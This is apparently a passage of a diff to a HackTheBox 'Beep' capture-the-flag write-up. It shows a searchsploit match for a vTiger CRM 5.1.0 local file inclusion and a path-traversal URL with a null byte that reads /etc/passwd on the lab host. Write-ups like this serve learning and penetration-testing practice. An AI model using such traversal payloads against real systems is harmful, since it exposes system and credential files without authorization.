thomaslaurenson/trophyroom/hackthebox/machines/beep/README.md

 vTiger CRM 5.1.0 - Local File Inclusion                                           | php/webapps/18770.txt
 ```

 A `searchsploit` lookup found an exact match for the version I was targeting - and was an LFI... perfect.
-The exploit was exceptionally simple - and endpoint vulnerable with the usual `/etc/passwd` PoC.
+The exploit was simple - and they provided the common `/etc/passwd` PoC.
 I updated the example to match the target machine:

 ```none
 https://beep.htb/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00